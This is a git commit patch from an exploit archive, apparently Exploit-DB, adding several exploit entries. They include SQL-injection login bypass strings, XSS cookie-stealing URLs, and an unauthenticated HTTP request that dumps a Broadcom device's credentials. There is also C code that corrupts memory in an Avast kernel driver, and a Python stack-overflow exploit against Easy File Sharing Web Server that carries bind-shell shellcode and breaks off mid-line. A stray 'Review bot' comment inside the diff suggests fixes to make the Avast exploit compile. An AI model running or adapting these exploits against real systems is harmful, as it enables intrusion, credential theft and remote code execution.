From 4d927f6c335dbe8b99d839f533cc83189ad32389 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 16 May 2014 04:36:04 +0000 Subject: [PATCH] Updated 05_16_2014 --- files.csv | 14 ++++ platforms/asp/webapps/33361.txt | 17 ++++ platforms/hardware/webapps/33353.txt | 49 +++++++++++ platforms/linux/remote/33364.txt | 13 +++ platforms/multiple/remote/33363.txt | 14 ++++ platforms/php/webapps/33354.txt | 13 +++ platforms/php/webapps/33355.txt | 9 ++ platforms/php/webapps/33356.txt | 10 +++ platforms/php/webapps/33357.txt | 9 ++ platforms/php/webapps/33358.txt | 12 +++ platforms/php/webapps/33359.txt | 9 ++ platforms/php/webapps/33362.txt | 9 ++ platforms/php/webapps/33365.txt | 9 ++ platforms/windows/local/33360.c | 88 ++++++++++++++++++++ platforms/windows/remote/33352.py | 118 +++++++++++++++++++++++++++ 15 files changed, 393 insertions(+) create mode 100755 platforms/asp/webapps/33361.txt create mode 100755 platforms/hardware/webapps/33353.txt create mode 100755 platforms/linux/remote/33364.txt create mode 100755 platforms/multiple/remote/33363.txt create mode 100755 platforms/php/webapps/33354.txt create mode 100755 platforms/php/webapps/33355.txt create mode 100755 platforms/php/webapps/33356.txt create mode 100755 platforms/php/webapps/33357.txt create mode 100755 platforms/php/webapps/33358.txt create mode 100755 platforms/php/webapps/33359.txt create mode 100755 platforms/php/webapps/33362.txt create mode 100755 platforms/php/webapps/33365.txt create mode 100755 platforms/windows/local/33360.c create mode 100755 platforms/windows/remote/33352.py diff --git a/files.csv b/files.csv index 3edd85333..d4a8c9f43 100755 --- a/files.csv +++ b/files.csv 
@@ -30065,3 +30065,17 @@ id,file,description,date,author,platform,type,port 33348,platforms/windows/dos/33348.pl,"TFTPD32 4.5 / TFTPD64 4.5 - DoS PoC",2014-05-14,"Martinez FrostCard",windows,dos,0 33350,platforms/windows/dos/33350.xml,"Yahoo! Messenger 9 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service Vulnerability",2009-11-12,HACKATTACK,windows,dos,0 33351,platforms/novell/remote/33351.pl,"Novell eDirectory 8.8 '/dhost/modules?I:' Buffer Overflow Vulnerability",2009-11-12,HACKATTACK,novell,remote,0 +33352,platforms/windows/remote/33352.py,"Easy File Sharing Web Server 6.8 - Stack Buffer Overflow",2014-05-14,superkojiman,windows,remote,80 +33353,platforms/hardware/webapps/33353.txt,"Broadcom PIPA C211 - Sensitive Information Disclosure",2014-05-14,Portcullis,hardware,webapps,80 +33354,platforms/php/webapps/33354.txt,"PHD Help Desk 1.43 area.php Multiple Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0 +33355,platforms/php/webapps/33355.txt,"PHD Help Desk 1.43 solic_display.php q_registros Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0 +33356,platforms/php/webapps/33356.txt,"PHD Help Desk 1.43 area_list.php Multiple Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0 +33357,platforms/php/webapps/33357.txt,"PHD Help Desk 1.43 atributo.php URL Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0 +33358,platforms/php/webapps/33358.txt,"PHD Help Desk 1.43 atributo_list.php Multiple Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0 +33359,platforms/php/webapps/33359.txt,"PHD Help Desk 1.43 caso_insert.php URL Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0 +33360,platforms/windows/local/33360.c,"Avast! 
Antivirus <= 4.8.1356 'aswRdr.sys' Driver Local Privilege Escalation Vulnerability",2009-11-16,Evilcry,windows,local,0 +33361,platforms/asp/webapps/33361.txt,"Multiple JiRo's Products 'files/login.asp' Multiple SQL Injection Vulnerabilities",2009-11-17,blackenedsecurity,asp,webapps,0 +33362,platforms/php/webapps/33362.txt,"CubeCart 3.0.4/4.3.6 'productId' Parameter SQL Injection Vulnerability",2009-11-19,"Sangte Amtham",php,webapps,0 +33363,platforms/multiple/remote/33363.txt,"Opera Web Browser 10.01 'dtoa()' Remote Code Execution Vulnerability",2009-11-20,"Maksymilian Arciemowicz",multiple,remote,0 +33364,platforms/linux/remote/33364.txt,"KDE 4.3.3 KDELibs 'dtoa()' Remote Code Execution Vulnerability",2009-11-20,"Maksymilian Arciemowicz",linux,remote,0 +33365,platforms/php/webapps/33365.txt,"WordPress WP-PHPList Plugin 2.10.2 'unsubscribeemail' Parameter Cross-Site Scripting Vulnerability",2009-11-29,MustLive,php,webapps,0 diff --git a/platforms/asp/webapps/33361.txt b/platforms/asp/webapps/33361.txt new file mode 100755 index 000000000..0534bd7ee --- /dev/null +++ b/platforms/asp/webapps/33361.txt @@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/37045/info + +Multiple JiRo's products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the applications, access or modify data, or exploit latent vulnerabilities in the underlying database. + +The following products are affected: + +JBS 2.0 +JBSX + +Other products may also be affected. + +The following proof-of-concept login and password examples are available: + +admin 'or' '=' +password 'or' '=' \ No newline at end of file diff --git a/platforms/hardware/webapps/33353.txt b/platforms/hardware/webapps/33353.txt new file mode 100755 index 000000000..414c76861 --- /dev/null +++ b/platforms/hardware/webapps/33353.txt 
@@ -0,0 +1,49 @@ +Vulnerability title: Unauthenticated Credential And Configuration +Retrieval In Broadcom Ltd PIPA C211 +CVE: CVE-2014-2046 +Vendor: Broadcom Ltd +Product: PIPA C211 +Affected version: Soft Rev: SR1.1, HW Rev: PIPA C211 rev2 +Fixed version: N/A +Reported by: Jerzy Kramarz + +Details: + +By sending the following request to the BROADCOM PIPA C211 web interface it is possible to retrieve complete system configuration including administrative credentials, SMTP community strings, FTP upload credentials and all other system user credentials: + +POST /cgi-bin/rpcBridge HTTP/1.1 +Host: +Proxy-Connection: keep-alive +Content-Length: 574 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.102 Safari/537.36 +Origin: http:// +Content-Type: text/xml +Accept: */* +DNT: 1 +Referer: http://:/ +Accept-Encoding: gzip,deflate,sdch +Accept-Language: en-US,en;q=0.8,es;q=0.6,pl;q=0.4 + +config.getValuesHashExcludePathssys00sys.applications.aptcodec.horizonnextgen.statussys.applications.aptcodec.horizonnextgen.configuration + + + +Further details at: +https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2046/ + + +Copyright: +Copyright (c) Portcullis Computer Security Limited 2014, All rights +reserved worldwide. Permission is hereby granted for the electronic +redistribution of this information. It is not to be edited or altered in +any way without the express written consent of Portcullis Computer +Security Limited. + +Disclaimer: +The information herein contained may change without notice. Use of this +information constitutes acceptance for use in an AS IS condition. There +are NO warranties, implied or otherwise, with regard to this information +or its use. Any use of this information is at the user's risk. 
In no +event shall the author/distributor (Portcullis Computer Security +Limited) be held liable for any damages whatsoever arising out of or in +connection with the use or spread of this information. \ No newline at end of file diff --git a/platforms/linux/remote/33364.txt b/platforms/linux/remote/33364.txt new file mode 100755 index 000000000..f5dcb3de5 --- /dev/null +++ b/platforms/linux/remote/33364.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/37080/info + +KDE is prone to a remote code-execution vulnerability that affects KDELibs. + +Successful exploits may allow an attacker to execute arbitrary code. Failed attacks may cause denial-of-service conditions. + +NOTE: This issue is related to BID 35510 (Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability), but because of differences in the code base, it is being assigned its own record. + +This issue affects KDE KDELibs 4.3.3; other versions may also be affected. + + \ No newline at end of file diff --git a/platforms/multiple/remote/33363.txt b/platforms/multiple/remote/33363.txt new file mode 100755 index 000000000..3128de2be --- /dev/null +++ b/platforms/multiple/remote/33363.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/37078/info + +Opera Web Browser is prone to a remote code-execution vulnerability. + +Successful exploits may allow an attacker to execute arbitrary code. Failed attacks may cause denial-of-service conditions. + +NOTE: This issue is related to BID 35510 (Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability), but because of differences in the code base, it is being assigned its own record. + +This issue affects Opera 10.01; other versions may also be affected. + + + \ No newline at end of file diff --git a/platforms/php/webapps/33354.txt b/platforms/php/webapps/33354.txt new file mode 100755 index 000000000..37c124e28 --- /dev/null +++ b/platforms/php/webapps/33354.txt 
@@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/37029/info + +PHD Help Desk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible. + +PHD Help Desk 1.43 is vulnerable; other versions may also be affected. + +http://www.example.com/area.php/[code] +http://www.example.com/area.php?pagina=[code] +http://www.example.com/area.php?sentido=[code] +http://www.example.com/area.php?q_registros=[code] +http://www.example.com/area.php?orden=[code] \ No newline at end of file diff --git a/platforms/php/webapps/33355.txt b/platforms/php/webapps/33355.txt new file mode 100755 index 000000000..3a65697ed --- /dev/null +++ b/platforms/php/webapps/33355.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37029/info + +PHD Help Desk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible. + +PHD Help Desk 1.43 is vulnerable; other versions may also be affected. + +http://www.example.com/solic_display.php?pagina=1&q_registros=[code]&orden=seq_solicitud_id \ No newline at end of file diff --git a/platforms/php/webapps/33356.txt b/platforms/php/webapps/33356.txt new file mode 100755 index 000000000..1948f80d0 --- /dev/null +++ b/platforms/php/webapps/33356.txt 
@@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/37029/info + +PHD Help Desk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible. + +PHD Help Desk 1.43 is vulnerable; other versions may also be affected. + +http://www.example.com/area_list.php/[code] +http://www.example.com/area_list.php?pagina=1&q_registros=0[code]&orden=nombre \ No newline at end of file diff --git a/platforms/php/webapps/33357.txt b/platforms/php/webapps/33357.txt new file mode 100755 index 000000000..d9aa392bb --- /dev/null +++ b/platforms/php/webapps/33357.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37029/info + +PHD Help Desk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible. + +PHD Help Desk 1.43 is vulnerable; other versions may also be affected. + +http://www.example.com/atributo.php/[code] \ No newline at end of file diff --git a/platforms/php/webapps/33358.txt b/platforms/php/webapps/33358.txt new file mode 100755 index 000000000..01064c031 --- /dev/null +++ b/platforms/php/webapps/33358.txt 
@@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/37029/info + +PHD Help Desk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible. + +PHD Help Desk 1.43 is vulnerable; other versions may also be affected. + +http://www.example.com/atributo_list.php?pagina=1[code]&q_registros=15&orden=activo&sentido +http://www.example.com/atributo_list.php?pagina=1&q_registros=15[code]&orden=activo&sentido +http://www.example.com/atributo_list.php?pagina=1&q_registros=15&orden=activo[code]&sentido +http://www.example.com/atributo_list.php?pagina=1&q_registros=15&orden=activo&sentido[code] \ No newline at end of file diff --git a/platforms/php/webapps/33359.txt b/platforms/php/webapps/33359.txt new file mode 100755 index 000000000..547f41792 --- /dev/null +++ b/platforms/php/webapps/33359.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37029/info + +PHD Help Desk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible. + +PHD Help Desk 1.43 is vulnerable; other versions may also be affected. + +http://www.example.com/caso_insert.php/[code] \ No newline at end of file diff --git a/platforms/php/webapps/33362.txt b/platforms/php/webapps/33362.txt new file mode 100755 index 000000000..a649234e5 --- /dev/null +++ b/platforms/php/webapps/33362.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37065/info + +CubeCart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +The issue affects CubeCart 4.3.6; prior versions may also be affected. + +http://www.example.com/store/index.php?_a=viewProd&productId=22+and+1=2+union+select+version() \ No newline at end of file diff --git a/platforms/php/webapps/33365.txt b/platforms/php/webapps/33365.txt new file mode 100755 index 000000000..be75feb0a --- /dev/null +++ b/platforms/php/webapps/33365.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37096/info + +The WP-PHPList plugin for WordPress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +WP-PHPList 2.10.2 is vulnerable; other versions may also be affected. + +http://www.example.com/wp-phplist.php?p=unsubscribe&id=1&unsubscribeemail=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/windows/local/33360.c b/platforms/windows/local/33360.c new file mode 100755 index 000000000..468e12d81 --- /dev/null +++ b/platforms/windows/local/33360.c 
@@ -0,0 +1,88 @@ +source: http://www.securityfocus.com/bid/37031/info + +Avast! Antivirus is prone to a local privilege-escalation vulnerability. + +Local attackers can exploit this issue to execute arbitrary code with superuser privileges and completely compromise the affected computer. Failed exploit attempts will result in a denial-of-service condition. + +Avast! Antivirus 4.8.1356 is vulnerable; other versions may also be affected. + +/* Avast 4.8.1356.0 antivirus aswRdr.sys Kernel Pool Corruption +* +* Author(s): Giuseppe 'Evilcry' Bonfa' +* AbdulAziz Hariri +* E-Mail: evilcry _AT_ gmail _DOT_ com +* Website: http://evilcry.netsons.org +* http://evilcodecave.blogspot.com +* http://evilcodecave.wordpress.com +* http://evilfingers.com +* +* Disclosure Timeline: As specified in the Advisory. +*/ + +#define WIN32_LEAN_AND_MEAN +#include +#include + + +BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab +{ + WCHAR DeviceName[MAX_PATH]; + HANDLE hDevice; + + if ((GetVersion() & 0xFF) >= 5) + { + wcscpy(DeviceName, L"\\\\.\\Global\\"); + } + else + { + wcscpy(DeviceName, L"\\\\.\\"); + } + + wcscat(DeviceName, DriverName); + + printf("Opening.. 
%S\n", DeviceName); + + hDevice = CreateFileW(DeviceName, GENERIC_READ | GENERIC_WRITE, 0, +NULL, OPEN_EXISTING, + FILE_ATTRIBUTE_NORMAL, NULL); + + if (hDevice == INVALID_HANDLE_VALUE) + { + printf("CreateFile() ERROR %d\n", GetLastError()); + return FALSE; + } + + *lphDevice = hDevice; + + return TRUE; +} + +int main() +{ + HANDLE hDev = NULL; + DWORD Junk; + + if(!OpenDevice(L"aswRDR",&hDev)) + { + printf("Unable to access aswMon"); + return(0); + } + + char *Buff = (char *)VirtualAlloc(NULL, 0x156, MEM_RESERVE | +MEM_COMMIT, PAGE_EXECUTE_READWRITE); + + if (Buff) + { + memset(Buff, 'A', 0x156); + +DeviceIoControl(hDev,0x80002024,Buff,0x156,Buff,0x156,&Junk,(LPOVERLAPPED)NULL); + printf("DeviceIoControl Executed..\n"); + } + else + { + printf("VirtualAlloc() ERROR %d\n", GetLastError()); + } + + + return(0); +} diff --git a/platforms/windows/remote/33352.py b/platforms/windows/remote/33352.py new file mode 100755 index 000000000..b78976d1b --- /dev/null +++ b/platforms/windows/remote/33352.py 
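Review bot: In `main`, the failure message after `OpenDevice(L"aswRDR", &hDev)` names a different device — `printf("Unable to access aswMon");` should read `printf("Unable to access aswRDR\n");` — and neither the device handle nor the allocation is released on the success path, so add `VirtualFree(Buff, 0, MEM_RELEASE);` after the `DeviceIoControl` block and `CloseHandle(hDev);` before the final `return(0);`. The two `#include` lines appear with their header names missing (the angle-bracketed names were probably lost when the file was rendered), which would make the file as committed fail to compile, so they should be restored. In `OpenDevice`, `wcscpy`/`wcscat` write into `DeviceName[MAX_PATH]` with no length check on `DriverName`; the bounded `wcscpy_s`/`wcscat_s` variants, or an explicit length check against `MAX_PATH`, would make the helper safe for any caller other than the single literal used here. The buffer handed to `DeviceIoControl` is only ever filled with data, so `PAGE_READWRITE` is sufficient in place of `PAGE_EXECUTE_READWRITE`.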
@@ -0,0 +1,118 @@ +# Exploit Title: Easy File Sharing Web Server 6.8 stack buffer overflow +# Date: 10 May 2014 +# Exploit Author: superkojiman - http://www.techorganic.com +# Vendor Homepage: http://www.efssoft.com +# Software Link: http://www.sharing-file.com/efssetup.exe +# Version: 6.8 +# Tested on: English version of Windows XP Professional SP2 and SP3 +# +# Description: +# By setting UserID in the cookie to a long string, we can overwrite EDX which +# allows us to control execution flow when the following instruction is +# executed: +# +# 0x0045C8C2: CALL DWORD PTR DS:[EDX+28] +# +# We can point EDX+28 to a location in the stack containing a pointer to +# instructions we want to execute. This pointer can be placed at 0x01??6969. +# Under Windows XP Professional SP2/SP3, the first, third, and fourth bytes +# in the address are always the same. The second byte is random so we need +# to bruteforce it. This takes at most 255 tries and the server doesn't crash +# so we can keep trying. +# +# The pointer placed at 0x01??6969 is a pointer to a CALL ESI. ESI points to +# a small space in our payload. We fill this small space with instructions to +# jump further down the stack where our shellcode is stored. 
+# +# Tested with Easy File Sharing Webserver installed in the default location at +# C:\EFS Software\Easy File Sharing Web Server +# + +import socket +import struct +import time +import sys + +target = "192.168.1.140" +port = 80 + +# Shellcode from https://code.google.com/p/w32-bind-ngs-shellcode/ +# Binds a shell on port 28876 +# msfencode -b '\x00\x20' -i w32-bind-ngs-shellcode.bin +# [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1) +shellcode = ( +"\xbb\xa1\x68\xde\x7c\xdd\xc0\xd9\x74\x24\xf4\x58\x33\xc9" + +"\xb1\x36\x31\x58\x14\x83\xe8\xfc\x03\x58\x10\x43\x9d\xef" + +"\xb5\xe7\xd5\x61\x76\x6c\x9f\x8d\xfd\x04\x7c\x05\x6f\xe0" + +"\xf7\x67\x50\x7b\x31\xa0\xdf\x63\x4b\x23\x8e\xfb\x81\x9c" + +"\x02\xc9\x8d\x44\x33\x5a\x3d\xe1\x0c\x2b\xc8\x69\xfb\xd5" + +"\x7e\x8a\xd5\xd5\xa8\x41\xac\x02\x7c\xaa\x05\x8d\xd0\x0c" + +"\x0b\x5a\x82\x0d\x44\x48\x80\x5d\x10\xcd\xf4\xea\x7a\xf0" + +"\x7c\xec\x69\x81\x36\xce\x6c\x7c\x9e\x3f\xbd\x3c\x94\x74" + +"\xd0\xc1\x44\xc0\xe4\x6d\xac\x58\x21\xa9\xf1\xeb\x44\xc6" + +"\x30\x2b\xd2\xc3\x1b\xb8\x57\x37\xa5\x57\x68\x80\xb1\xf6" + +"\xfc\xa5\xa5\xf9\xeb\xb0\x3e\xfa\xef\x53\x15\x7d\xd1\x5a" + +"\x1f\x76\xa3\x02\xdb\xd5\x44\x6a\xb4\x4c\x3a\xb4\x48\x1a" + +"\x8a\x96\x03\x1b\x3c\x8b\xa3\x34\x28\x52\x74\x4b\xac\xdb" + +"\xb8\xd9\x43\xb4\x13\x48\x9b\xea\xe9\xb3\x17\xf2\xc3\xe1" + +"\x8a\x6a\x47\x6b\x4f\x4a\x0a\x0f\xab\xb2\xbf\x5b\x18\x04" + +"\xf8\x72\x5e\xdc\x80\xb9\x45\x8b\xdc\x93\xd7\xf5\xa6\xfc" + +"\xd0\xae\x7a\x51\xb6\x02\x84\x03\xdc\x29\x3c\x50\xf5\xe7" + +"\x3e\x57\xf9" +) + +print "[+] We're guessing an address on the stack. It will be a few minutes..." 
+ +for i in xrange(1,255): + n = "" + if i < 16: + n = "0" + hex(i)[-1] + else: + n = hex(i)[2:] + + # craft the value of EDX that will be used in CALL DWORD PTR DS:[EDX+28] + guess = "0x01" + n + "6940" + sys.stdout.write("="); + + payload = "A"*64 # padding + payload += "\x81\xee\x70\xff\xff\xff" # SUB ESI,-90 + payload += "\xff\xe6" # JMP ESI + + payload += "A"*8 # padding + payload += struct.pack("